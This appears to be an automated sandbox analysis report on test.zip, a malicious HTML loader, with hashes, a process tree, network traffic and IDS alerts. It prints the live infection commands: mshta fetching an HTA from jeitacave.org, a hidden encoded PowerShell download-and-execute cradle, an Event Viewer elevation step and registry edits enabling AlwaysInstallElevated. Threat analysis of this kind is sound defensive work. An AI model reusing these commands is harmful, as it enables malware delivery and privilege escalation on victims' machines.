File name: | test.zip |
Full analysis: | https://app.any.run/tasks/94361e03-cbb1-4b77-880c-8f37358e7968 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | September 19, 2019, 06:48:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 5D8D6DE64947112A32F116883196A601 |
SHA1: | D02D38556987B8AE44D3FD550C5AF311AB3E2B0C |
SHA256: | 3FAE463DA72B3C456373763A2F0FF06538859DE2F16678F6D8748436DC71C4B6 |
SSDEEP: | 96:SiBRGyETgMWEOHHFvWqMlnMMpT5VN3W7X+ouUk8C4+rH8EE1keS1jn2YpXedf1Bt:ZRGRSMhlF7eu2NCt4EEG1L2+XeITHYf |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | - |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:19 09:42:02 |
ZipCRC: | 0xf547b209 |
ZipCompressedSize: | 7849 |
ZipUncompressedSize: | 42608 |
ZipFileName: | test.html |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3564 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\test.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3612 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa3564.22074\test.html | C:\Program Files\Internet Explorer\iexplore.exe | WinRAR.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
4028 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3612 CREDAT:79873 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 3221225615 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2684 | mshta http://jeitacave.org/hta.hta | C:\Windows\system32\mshta.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2536 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3220 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Event Viewer Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2624 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Event Viewer Snapin Launcher Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3364 | "cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f® add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f | C:\Windows\system32\cmd.exe | — | Eventvwr.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
552 | reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f | C:\Windows\system32\reg.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2676 | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f | C:\Windows\system32\reg.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3612 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3612 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
2536 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F5I1QDH0MTRWM6YAY1AW.temp | — | |
MD5:— | SHA256:— | |||
3612 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF61337B47EBFD912D.TMP | — | |
MD5:— | SHA256:— | |||
3612 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{829A1EE0-DAA9-11E9-B86F-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
1260 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6DXAI1ZM92V69QS5HW3I.temp | — | |
MD5:— | SHA256:— | |||
1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\fxbnopas.0.cs | — | |
MD5:— | SHA256:— | |||
1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\fxbnopas.cmdline | — | |
MD5:— | SHA256:— | |||
3300 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC11F1.tmp | — | |
MD5:— | SHA256:— | |||
3300 | csc.exe | C:\Users\admin\AppData\Local\Temp\fxbnopas.pdb | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2684 | mshta.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/hta.hta | US | html | 466 b | malicious |
2536 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/ps001.jpg | US | text | 81.6 Kb | malicious |
3836 | msiexec.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg | US | executable | 3.43 Mb | malicious |
3612 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3612 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2536 | powershell.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
2684 | mshta.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
3836 | msiexec.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
jeitacave.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2684 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
2684 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
3836 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
3836 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] PE as Image Content type mismatch |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|